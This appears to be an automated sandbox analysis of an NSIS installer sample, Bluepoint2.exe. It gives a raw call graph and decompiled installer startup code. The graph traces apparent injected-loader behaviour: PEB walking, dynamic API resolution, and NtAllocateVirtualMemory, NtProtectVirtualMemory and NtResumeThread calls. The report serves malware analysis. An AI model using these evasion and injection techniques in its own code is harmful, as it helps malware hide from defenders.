calls 6935->6936 6937 4016d2 GetFullPathNameW 6936->6937 6938 40170e 6937->6938 6939 4016ec 6937->6939 6940 401723 GetShortPathNameW 6938->6940 6941 402c2a 6938->6941 6939->6938 6942 40699e 2 API calls 6939->6942 6940->6941 6943 4016fe 6942->6943 6943->6938 6945 406668 lstrcpynW 6943->6945 6945->6938 7405 33618a4 7406 33618ef 7405->7406 7407 336c8b9 3 API calls 7406->7407 7408 33618f7 7407->7408 6946 403cd5 6947 403ce0 6946->6947 6948 403ce4 6947->6948 6949 403ce7 GlobalAlloc 6947->6949 6949->6948 6950 33601a3 6951 33601c0 6950->6951 6954 336d7f8 6951->6954 6953 33601f9 6955 336d82e 6954->6955 6956 336bcff 2 API calls 6955->6956 6957 336d882 6956->6957 6958 336bcff 2 API calls 6957->6958 6959 336d89c 6958->6959 6960 336d8aa GetPEB 6959->6960 6961 336d90d 6960->6961 6962 336e61c NtProtectVirtualMemory 6961->6962 6963 336d95b 6962->6963 6964 335e32a 6963->6964 6965 336e0fa 6963->6965 6973 336dc44 6963->6973 6964->6953 6968 336e43b 6965->6968 6969 336e1ec 6965->6969 6966 336e61c NtProtectVirtualMemory 6967 336e619 6966->6967 6967->6953 6968->6966 6970 336e61c NtProtectVirtualMemory 6969->6970 6971 336e436 6970->6971 6971->6953 6972 336e61c NtProtectVirtualMemory 6972->6964 6973->6964 6973->6972 6974 335d5a3 6975 335d5ae 6974->6975 6983 336f30f 6974->6983 6976 336c8b9 3 API calls 6975->6976 6975->6983 6977 335d5f9 6976->6977 6978 335d65d 6977->6978 6979 336bcff 2 API calls 6977->6979 6977->6983 6980 336bcff 2 API calls 6978->6980 6979->6978 6981 335d675 6980->6981 6984 335d682 6981->6984 6985 336ebf6 NtResumeThread 6984->6985 6986 335d6a1 6985->6986 6986->6983 6987 4014d7 6988 402d84 17 API calls 6987->6988 6989 4014dd Sleep 6988->6989 6991 402c2a 6989->6991 6339 4020d8 6340 4020ea 6339->6340 6350 40219c 6339->6350 6341 402da6 17 API calls 6340->6341 6343 4020f1 6341->6343 6342 401423 24 API calls 6348 4022f6 6342->6348 6344 402da6 17 API calls 6343->6344 6345 4020fa 6344->6345 6346 402110 LoadLibraryExW 6345->6346 6347 402102 GetModuleHandleW 6345->6347 6349 402121 6346->6349 6346->6350 6347->6346 6347->6349 6362 406aa4 6349->6362 6350->6342 6353 402132 6355 402151 6353->6355 6356 40213a 6353->6356 6354 40216b 6357 4056ca 24 API calls 6354->6357 6367 713c1817 6355->6367 6358 401423 24 API calls 6356->6358 6359 402142 6357->6359 6358->6359 6359->6348 6360 40218e FreeLibrary 6359->6360 6360->6348 6409 40668a WideCharToMultiByte 6362->6409 6364 406ac1 6365 406ac8 GetProcAddress 6364->6365 6366 40212c 6364->6366 6365->6366 6366->6353 6366->6354 6368 713c184a 6367->6368 6410 713c1bff 6368->6410 6370 713c1851 6371 713c1976 6370->6371 6372 713c1869 6370->6372 6373 713c1862 6370->6373 6371->6359 6444 713c2480 6372->6444 6458 713c243e 6373->6458 6378 713c18cd 6384 713c191e 6378->6384 6385 713c18d3 6378->6385 6379 713c18af 6471 713c2655 6379->6471 6380 713c187f 6383 713c1885 6380->6383 6388 713c1890 6380->6388 6381 713c1898 6394 713c188e 6381->6394 6468 713c2e23 6381->6468 6383->6394 6454 713c2b98 6383->6454 6386 713c2655 10 API calls 6384->6386 6490 713c1666 6385->6490 6392 713c190f 6386->6392 6387 713c18b5 6482 713c1654 6387->6482 6462 713c2810 6388->6462 6400 713c1965 6392->6400 6496 713c2618 6392->6496 6394->6378 6394->6379 6398 713c1896 6398->6394 6399 713c2655 10 API calls 6399->6392 6400->6371 6404 713c196f GlobalFree 6400->6404 6404->6371 6406 713c1951 6406->6400 6500 713c15dd wsprintfW 6406->6500 6407 713c194a FreeLibrary 6407->6406 6409->6364 6503 713c12bb GlobalAlloc 6410->6503 6412 713c1c26 6504 713c12bb GlobalAlloc 6412->6504 6414 713c1e6b GlobalFree GlobalFree GlobalFree 6415 713c1e88 6414->6415 6427 713c1ed2 6414->6427 6417 713c227e 6415->6417 6423 713c1e9d 6415->6423 6415->6427 6416 713c1d26 GlobalAlloc 6435 713c1c31 6416->6435 6418 713c22a0 GetModuleHandleW 6417->6418 6417->6427 6421 713c22c6 6418->6421 6422 713c22b1 LoadLibraryW 6418->6422 6419 713c1d71 lstrcpyW 6425 713c1d7b lstrcpyW 6419->6425 6420 713c1d8f GlobalFree 6420->6435 6511 713c16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 6421->6511 6422->6421 6422->6427 6423->6427 6507 713c12cc 6423->6507 6425->6435 6426 713c21ae 6426->6427 6441 713c2216 lstrcpyW 6426->6441 6427->6370 6428 713c2318 6428->6427 6430 713c2325 lstrlenW 6428->6430 6429 713c2126 6510 713c12bb GlobalAlloc 6429->6510 6512 713c16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 6430->6512 6434 713c2067 GlobalFree 6434->6435 6435->6414 6435->6416 6435->6419 6435->6420 6435->6425 6435->6426 6435->6427 6435->6429 6435->6434 6436 713c12cc 2 API calls 6435->6436 6437 713c1dcd 6435->6437 6436->6435 6437->6435 6505 713c162f GlobalSize GlobalAlloc 6437->6505 6438 713c22d8 6438->6428 6442 713c2302 GetProcAddress 6438->6442 6439 713c233f 6439->6427 6441->6427 6442->6428 6443 713c212f 6443->6370 6451 713c2498 6444->6451 6445 713c12cc GlobalAlloc lstrcpynW 6445->6451 6447 713c25c1 GlobalFree 6448 713c186f 6447->6448 6447->6451 6448->6380 6448->6381 6448->6394 6449 713c256b GlobalAlloc CLSIDFromString 6449->6447 6450 713c2540 GlobalAlloc WideCharToMultiByte 6450->6447 6451->6445 6451->6447 6451->6449 6451->6450 6453 713c258a 6451->6453 6514 713c135a 6451->6514 6453->6447 6518 713c27a4 6453->6518 6455 713c2baa 6454->6455 6521 713c2b42 6455->6521 6457 713c2d39 6457->6394 6459 713c2453 6458->6459 6460 713c245e GlobalAlloc 6459->6460 6461 713c1868 6459->6461 6460->6459 6461->6372 6466 713c2840 6462->6466 6463 713c28ee 6465 713c28f4 GlobalSize 6463->6465 6467 713c28fe 6463->6467 6464 713c28db GlobalAlloc 6464->6467 6465->6467 6466->6463 6466->6464 6467->6398 6470 713c2e2e 6468->6470 6469 713c2e6e GlobalFree 6470->6469 6525 713c12bb GlobalAlloc 6471->6525 6473 713c26d8 MultiByteToWideChar 6480 713c265f 6473->6480 6474 713c26fa StringFromGUID2 6474->6480 6475 713c270b lstrcpynW 6475->6480 6476 713c271e wsprintfW 6476->6480 6477 713c2742 GlobalFree 6477->6480 6478 713c2777 GlobalFree 6478->6387 6479 713c1312 2 API calls 6479->6480 6480->6473 6480->6474 6480->6475 6480->6476 6480->6477 6480->6478 6480->6479 6526 713c1381 6480->6526 6530 713c12bb GlobalAlloc 6482->6530 6484 713c1659 6485 713c1666 2 API calls 6484->6485 6486 713c1663 6485->6486 6487 713c1312 6486->6487 6488 713c131b GlobalAlloc lstrcpynW 6487->6488 6489 713c1355 GlobalFree 6487->6489 6488->6489 6489->6392 6491 713c169f lstrcpyW 6490->6491 6494 713c1672 wsprintfW 6490->6494 6495 713c16b8 6491->6495 6494->6495 6495->6399 6497 713c2626 6496->6497 6499 713c1931 6496->6499 6498 713c2642 GlobalFree 6497->6498 6497->6499 6498->6497 6499->6406 6499->6407 6501 713c1312 2 API calls 6500->6501 6502 713c15fe 6501->6502 6502->6400 6503->6412 6504->6435 6506 713c164d 6505->6506 6506->6437 6513 713c12bb GlobalAlloc 6507->6513 6509 713c12db lstrcpynW 6509->6427 6510->6443 6511->6438 6512->6439 6513->6509 6515 713c1361 6514->6515 6516 713c12cc 2 API calls 6515->6516 6517 713c137f 6516->6517 6517->6451 6519 713c2808 6518->6519 6520 713c27b2 VirtualAlloc 6518->6520 6519->6453 6520->6519 6522 713c2b4d 6521->6522 6523 713c2b52 GetLastError 6522->6523 6524 713c2b5d 6522->6524 6523->6524 6524->6457 6525->6480 6527 713c13ac 6526->6527 6528 713c138a 6526->6528 6527->6480 6528->6527 6529 713c1390 lstrcpyW 6528->6529 6529->6527 6530->6484 6992 4028de 6993 4028e6 6992->6993 6994 4028ea FindNextFileW 6993->6994 6996 4028fc 6993->6996 6995 402943 6994->6995 6994->6996 6998 406668 lstrcpynW 6995->6998 6998->6996 6999 335ef90 7000 336c8b9 3 API calls 6999->7000 7001 335efd2 6999->7001 7000->7001 7001->7001 7002 402aeb 7003 402d84 17 API calls 7002->7003 7004 402af1 7003->7004 7005 40292e 7004->7005 7006 4066a5 17 API calls 7004->7006 7006->7005 6165 336b09a 6166 336b0e7 6165->6166 6171 336c8b9 6166->6171 6168 336b0f5 6177 336b329 6168->6177 6170 336b1c7 6172 336c8c8 6171->6172 6176 335e2d4 6171->6176 6172->6176 6180 336bcff 6172->6180 6174 336c981 6175 336cb0e NtAllocateVirtualMemory 6174->6175 6174->6176 6175->6176 6176->6168 6178 336b368 CreateFileA 6177->6178 6178->6170 6181 336bd5a 6180->6181 6182 336bdf5 LoadLibraryA 6181->6182 6186 336c431 GetPEB 6181->6186 6184 336bdff 6182->6184 6184->6174 6185 336bdb6 6185->6182 6187 336c44f 6186->6187 6187->6185 7007 4026ec 7008 402d84 17 API calls 7007->7008 7016 4026fb 7008->7016 7009 402838 7010 402745 ReadFile 7010->7009 7010->7016 7011 4061db ReadFile 7011->7016 7012 402785 MultiByteToWideChar 7012->7016 7013 40283a 7020 4065af wsprintfW 7013->7020 7014 406239 5 API calls 7014->7016 7016->7009 7016->7010 7016->7011 7016->7012 7016->7013 7016->7014 7017 4027ab SetFilePointer MultiByteToWideChar 7016->7017 7018 40284b 7016->7018 7017->7016 7018->7009 7019 40286c SetFilePointer 7018->7019 7019->7009 7020->7009 7409 4023f4 7410 402da6 17 API calls 7409->7410 7411 402403 7410->7411 7412 402da6 17 API calls 7411->7412 7413 40240c 7412->7413 7414 402da6 17 API calls 7413->7414 7415 402416 GetPrivateProfileStringW 7414->7415 7021 4014f5 SetForegroundWindow 7022 402c2a 7021->7022 7416 401ff6 7417 402da6 17 API calls 7416->7417 7418 401ffd 7417->7418 7419 40699e 2 API calls 7418->7419 7420 402003 7419->7420 7422 402014 7420->7422 7423 4065af wsprintfW 7420->7423 7423->7422 7023 4046fa lstrcpynW lstrlenW 7024 4022ff 7025 402da6 17 API calls 7024->7025 7026 402305 7025->7026 7027 402da6 17 API calls 7026->7027 7028 40230e 7027->7028 7029 402da6 17 API calls 7028->7029 7030 402317 7029->7030 7031 40699e 2 API calls 7030->7031 7032 402320 7031->7032 7033 402331 lstrlenW lstrlenW 7032->7033 7034 402324 7032->7034 7036 4056ca 24 API calls 7033->7036 7035 4056ca 24 API calls 7034->7035 7038 40232c 7034->7038 7035->7038 7037 40236f SHFileOperationW 7036->7037 7037->7034 7037->7038 7431 4019ff 7432 402da6 17 API calls 7431->7432 7433 401a06 7432->7433 7434 402da6 17 API calls 7433->7434 7435 401a0f 7434->7435 7436 401a16 lstrcmpiW 7435->7436 7437 401a28 lstrcmpW 7435->7437 7438 401a1c 7436->7438 7437->7438 6023 336ebf6 6025 336ebfb 6023->6025 6027 336ec45 6025->6027 6026 33660a0 6027->6026 6028 336eec4 NtResumeThread 6027->6028 6029 336ef05 6028->6029 7439 401d81 7440 401d94 GetDlgItem 7439->7440 7441 401d87 7439->7441 7443 401d8e 7440->7443 7442 402d84 17 API calls 7441->7442 7442->7443 7445 402da6 17 API calls 7443->7445 7447 401dd5 GetClientRect LoadImageW SendMessageW 7443->7447 7445->7447 7446 401e33 7448 401e38 DeleteObject 7446->7448 7449 401e3f 7446->7449 7447->7446 7447->7449 7448->7449 7450 404783 7451 40479b 7450->7451 7455 4048b5 7450->7455 7456 4045c4 18 API calls 7451->7456 7452 40491f 7453 4049e9 7452->7453 7454 404929 GetDlgItem 7452->7454 7461 40462b 8 API calls 7453->7461 7457 404943 7454->7457 7458 4049aa 7454->7458 7455->7452 7455->7453 7459 4048f0 GetDlgItem SendMessageW 7455->7459 7460 404802 7456->7460 7457->7458 7465 404969 SendMessageW LoadCursorW SetCursor 7457->7465 7458->7453 7462 4049bc 7458->7462 7483 4045e6 EnableWindow 7459->7483 7464 4045c4 18 API calls 7460->7464 7472 4049e4 7461->7472 7467 4049d2 7462->7467 7468 4049c2 SendMessageW 7462->7468 7470 40480f CheckDlgButton 7464->7470 7484 404a32 7465->7484 7467->7472 7473 4049d8 SendMessageW 7467->7473 7468->7467 7469 40491a 7474 404a0e SendMessageW 7469->7474 7481 4045e6 EnableWindow 7470->7481 7473->7472 7474->7452 7476 40482d GetDlgItem 7482 4045f9 SendMessageW 7476->7482 7478 404843 SendMessageW 7479 404860 GetSysColor 7478->7479 7480 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 7478->7480 7479->7480 7480->7472 7481->7476 7482->7478 7483->7469 7487 405c8e ShellExecuteExW 7484->7487 7486 404998 LoadCursorW SetCursor 7486->7458 7487->7486 7488 402383 7489 40238a 7488->7489 7492 40239d 7488->7492 7490 4066a5 17 API calls 7489->7490 7491 402397 7490->7491 7491->7492 7493 405cc8 MessageBoxIndirectW 7491->7493 7493->7492 7039 40248a 7040 402da6 17 API calls 7039->7040 7041 40249c 7040->7041 7042 402da6 17 API calls 7041->7042 7043 4024a6 7042->7043 7056 402e36 7043->7056 7046 4024de 7048 4024ea 7046->7048 7051 402d84 17 API calls 7046->7051 7047 402c2a 7052 402509 RegSetValueExW 7048->7052 7053 403371 44 API calls 7048->7053 7049 402da6 17 API calls 7050 4024d4 lstrlenW 7049->7050 7050->7046 7051->7048 7054 40251f RegCloseKey 7052->7054 7053->7052 7054->7047 7057 402e51 7056->7057 7060 406503 7057->7060 7061 406512 7060->7061 7062 4024b6 7061->7062 7063 40651d RegCreateKeyExW 7061->7063 7062->7046 7062->7047 7062->7049 7063->7062 6188 336d7f8 6189 336d82e 6188->6189 6190 336bcff 2 API calls 6189->6190 6191 336d882 6190->6191 6192 336bcff 2 API calls 6191->6192 6193 336d89c 6192->6193 6194 336d8aa GetPEB 6193->6194 6195 336d90d 6194->6195 6208 336e61c 6195->6208 6197 336d95b 6198 335e32a 6197->6198 6199 336e0fa 6197->6199 6207 336dc44 6197->6207 6202 336e43b 6199->6202 6203 336e1ec 6199->6203 6200 336e61c NtProtectVirtualMemory 6201 336e619 6200->6201 6202->6200 6204 336e61c NtProtectVirtualMemory 6203->6204 6205 336e436 6204->6205 6206 336e61c NtProtectVirtualMemory 6206->6198 6207->6198 6207->6206 6209 336e656 NtProtectVirtualMemory 6208->6209 6209->6197 7064 401491 7065 4056ca 24 API calls 7064->7065 7066 401498 7065->7066 7067 402891 7068 402898 7067->7068 7070 402ba9 7067->7070 7069 402d84 17 API calls 7068->7069 7071 40289f 7069->7071 7072 4028ae SetFilePointer 7071->7072 7072->7070 7073 4028be 7072->7073 7075 4065af wsprintfW 7073->7075 7075->7070 7494 402f93 7495 402fa5 SetTimer 7494->7495 7496 402fbe 7494->7496 7495->7496 7497 40300c 7496->7497 7498 403012 MulDiv 7496->7498 7499 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 7498->7499 7499->7497 7076 713c23e9 7077 713c2453 7076->7077 7078 713c245e GlobalAlloc 7077->7078 7079 713c247d 7077->7079 7078->7077 7519 401b9b 7520 401ba8 7519->7520 7521 401bec 7519->7521 7522 401c31 7520->7522 7529 401bbf 7520->7529 7523 401bf1 7521->7523 7524 401c16 GlobalAlloc 7521->7524 7525 4066a5 17 API calls 7522->7525 7532 40239d 7522->7532 7523->7532 7540 406668 lstrcpynW 7523->7540 7526 4066a5 17 API calls 7524->7526 7528 402397 7525->7528 7526->7522 7528->7532 7533 405cc8 MessageBoxIndirectW 7528->7533 7538 406668 lstrcpynW 7529->7538 7530 401c03 GlobalFree 7530->7532 7533->7532 7534 401bce 7539 406668 lstrcpynW 7534->7539 7536 401bdd 7541 406668 lstrcpynW 7536->7541 7538->7534 7539->7536 7540->7530 7541->7532 7542 713c10e1 7552 713c1111 7542->7552 7543 713c12b0 GlobalFree 7544 713c1240 GlobalFree 7544->7552 7545 713c11d7 GlobalAlloc 7545->7552 7546 713c135a 2 API calls 7546->7552 7547 713c12ab 7547->7543 7548 713c1312 2 API calls 7548->7552 7549 713c129a GlobalFree 7549->7552 7550 713c1381 lstrcpyW 7550->7552 7551 713c116b GlobalAlloc 7551->7552 7552->7543 7552->7544 7552->7545 7552->7546 7552->7547 7552->7548 7552->7549 7552->7550 7552->7551 7080 40149e 7081 4014ac PostQuitMessage 7080->7081 7082 40239d 7080->7082 7081->7082 7553 40259e 7554 402de6 17 API calls 7553->7554 7555 4025a8 7554->7555 7556 402d84 17 API calls 7555->7556 7557 4025b1 7556->7557 7558 4025d9 RegEnumValueW 7557->7558 7559 4025cd RegEnumKeyW 7557->7559 7561 40292e 7557->7561 7560 4025ee RegCloseKey 7558->7560 7559->7560 7560->7561 7563 33656e9 7564 336573d 7563->7564 7569 3365a92 7563->7569 7565 336bcff 7564->7565 7566 33657cb GetPEB 7564->7566 7567 336bdf5 LoadLibraryA 7565->7567 7568 336c431 GetPEB 7565->7568 7566->7569 7570 336bdff 7567->7570 7571 336bdb6 7568->7571 7571->7567 7573 4015a3 7574 402da6 17 API calls 7573->7574 7575 4015aa SetFileAttributesW 7574->7575 7576 4015bc 7575->7576 7577 401fa4 7578 402da6 17 API calls 7577->7578 7579 401faa 7578->7579 7580 4056ca 24 API calls 7579->7580 7581 401fb4 7580->7581 7582 405c4b 2 API calls 7581->7582 7583 401fba 7582->7583 7584 401fdd CloseHandle 7583->7584 7586 406ae0 5 API calls 7583->7586 7587 40292e 7583->7587 7584->7587 7588 401fcf 7586->7588 7588->7584 7590 4065af wsprintfW 7588->7590 7590->7584 7591 4021aa 7592 402da6 17 API calls 7591->7592 7593 4021b1 7592->7593 7594 402da6 17 API calls 7593->7594 7595 4021bb 7594->7595 7596 402da6 17 API calls 7595->7596 7597 4021c5 7596->7597 7598 402da6 17 API calls 7597->7598 7599 4021cf 7598->7599 7600 402da6 17 API calls 7599->7600 7601 4021d9 7600->7601 7602 402218 CoCreateInstance 7601->7602 7603 402da6 17 API calls 7601->7603 7606 402237 7602->7606 7603->7602 7604 401423 24 API calls 7605 4022f6 7604->7605 7606->7604 7606->7605 7607 33614d8 7608 33614db 7607->7608 7609 336ebf6 NtResumeThread 7608->7609 7610 336150a 7609->7610 7611 336ebf6 NtResumeThread 7610->7611 7612 33615ed 7611->7612 7613 336ebf6 NtResumeThread 7612->7613 7614 3361606 7613->7614 7615 4023b2 7616 4023ba 7615->7616 7619 4023c0 7615->7619 7617 402da6 17 API calls 7616->7617 7617->7619 7618 4023ce 7620 4023dc 7618->7620 7622 402da6 17 API calls 7618->7622 7619->7618 7621 402da6 17 API calls 7619->7621 7623 402da6 17 API calls 7620->7623 7621->7618 7622->7620 7624 4023e5 WritePrivateProfileStringW 7623->7624 7095 404ab5 7096 404ae1 7095->7096 7097 404af2 7095->7097 7156 405cac GetDlgItemTextW 7096->7156 7098 404afe GetDlgItem 7097->7098 7101 404b5d 7097->7101 7100 404b12 7098->7100 7104 404b26 SetWindowTextW 7100->7104 7107 405fe2 4 API calls 7100->7107 7109 4066a5 17 API calls 7101->7109 7117 404c41 7101->7117 7154 404df0 7101->7154 7102 404aec 7103 4068ef 5 API calls 7102->7103 7103->7097 7108 4045c4 18 API calls 7104->7108 7106 40462b 8 API calls 7111 404e04 7106->7111 7112 404b1c 7107->7112 7113 404b42 7108->7113 7114 404bd1 SHBrowseForFolderW 7109->7114 7110 404c71 7115 40603f 18 API calls 7110->7115 7112->7104 7120 405f37 3 API calls 7112->7120 7116 4045c4 18 API calls 7113->7116 7114->7117 7118 404be9 CoTaskMemFree 7114->7118 7119 404c77 7115->7119 7121 404b50 7116->7121 7117->7154 7158 405cac GetDlgItemTextW 7117->7158 7122 405f37 3 API calls 7118->7122 7159 406668 lstrcpynW 7119->7159 7120->7104 7157 4045f9 SendMessageW 7121->7157 7124 404bf6 7122->7124 7127 404c2d SetDlgItemTextW 7124->7127 7131 4066a5 17 API calls 7124->7131 7126 404b56 7130 406a35 5 API calls 7126->7130 7127->7117 7128 404c8e 7129 406a35 5 API calls 7128->7129 7137 404c95 7129->7137 7130->7101 7132 404c15 lstrcmpiW 7131->7132 7132->7127 7134 404c26 lstrcatW 7132->7134 7133 404cd6 7160 406668 lstrcpynW 7133->7160 7134->7127 7136 404cdd 7138 405fe2 4 API calls 7136->7138 7137->7133 7142 405f83 2 API calls 7137->7142 7143 404d2e 7137->7143 7139 404ce3 GetDiskFreeSpaceW 7138->7139 7141 404d07 MulDiv 7139->7141 7139->7143 7141->7143 7142->7137 7144 404d9f 7143->7144 7146 404f3a 20 API calls 7143->7146 7145 404dc2 7144->7145 7147 40140b 2 API calls 7144->7147 7161 4045e6 EnableWindow 7145->7161 7148 404d8c 7146->7148 7147->7145 7149 404da1 SetDlgItemTextW 7148->7149 7150 404d91 7148->7150 7149->7144 7152 404e71 20 API calls 7150->7152 7152->7144 7153 404dde 7153->7154 7162 404a0e 7153->7162 7154->7106 7156->7102 7157->7126 7158->7110 7159->7128 7160->7136 7161->7153 7163 404a21 SendMessageW 7162->7163 7164 404a1c 7162->7164 7163->7154 7164->7163 7165 4014b8 7166 4014be 7165->7166 7167 401389 2 API calls 7166->7167 7168 4014c6 7167->7168 7625 33624cb 7626 33624e6 7625->7626 7628 335e32a 7625->7628 7627 336c8b9 3 API calls 7626->7627 7629 3362555 7627->7629 7630 336262c NtResumeThread 7629->7630 7631 3362622 7630->7631 7632 3360ccb 7635 3364ff9 GetPEB 7632->7635 7634 3360cd6 7636 335e2d4 7635->7636 7636->7634

                                                                                                                                    Executed Functions

                                                                                                                                    Function 00403640 Relevance: 86.2, APIs: 33, Strings: 16, Instructions: 450stringfilecomCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 44 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->44 45 40397d-403995 DeleteFileW call 4030d0 37->45 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 60 4038e9-4038ea 41->60 47 403827-40382e 42->47 48 40383f-403878 42->48 44->45 64 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 44->64 66 40399b-4039a1 45->66 67 403b6c-403b7a call 403c25 OleUninitialize 45->67 52 403830-403833 47->52 53 403835 47->53 54 403894-4038ce 48->54 55 40387a-40387f 48->55 52->48 52->53 53->48 57 4038d0-4038d4 54->57 58 4038d6-4038d8 54->58 55->54 61 403881-403889 55->61 57->58 65 4038f9-403906 call 406668 57->65 58->41 60->32 62 403890 61->62 63 40388b-40388e 61->63 62->54 63->54 63->62 64->45 64->67 65->37 70 4039a7-4039ba call 405f64 66->70 71 403a48-403a4f call 403d17 66->71 77 403b91-403b97 67->77 78 403b7c-403b8b call 405cc8 ExitProcess 67->78 84 403a0c-403a19 70->84 85 4039bc-4039f1 70->85 80 403a54-403a57 71->80 82 403b99-403bae GetCurrentProcess OpenProcessToken 77->82 83 403c0f-403c17 77->83 80->67 91 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 82->91 92 403bdf-403bed call 406a35 82->92 86 403c19 83->86 87 403c1c-403c1f ExitProcess 83->87 88 403a1b-403a29 call 40603f 84->88 89 403a5c-403a70 call 405c33 lstrcatW 84->89 93 4039f3-4039f7 85->93 86->87 88->67 105 403a2f-403a45 call 406668 * 2 88->105 103 403a72-403a78 lstrcatW 89->103 104 403a7d-403a97 lstrcatW lstrcmpiW 89->104 91->92 106 403bfb-403c06 ExitWindowsEx 92->106 107 403bef-403bf9 92->107 97 403a00-403a08 93->97 98 4039f9-4039fe 93->98 97->93 100 403a0a 97->100 98->97 98->100 100->84 103->104 108 403b6a 104->108 109 403a9d-403aa0 104->109 105->71 106->83 111 403c08-403c0a call 40140b 106->111 107->106 107->111 108->67 113 403aa2-403aa7 call 405b99 109->113 114 403aa9 call 405c16 109->114 111->83 121 403aae-403abe SetCurrentDirectoryW 113->121 114->121 123 403ac0-403ac6 call 406668 121->123 124 403acb-403af7 call 406668 121->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 134 403b63-403b65 call 406428 131->134 132->131 133 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->133 133->131 142 403b4d-403b54 CloseHandle 133->142 134->108 142->131
                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                    			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t180 = E00406A35(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E004069C5(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\Bluepoint2.exe\" ";
				E00406668(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x42a260 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\Bluepoint2.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00435002;
				}
				_t199 = CharNextW(E00405F64(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405F64(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
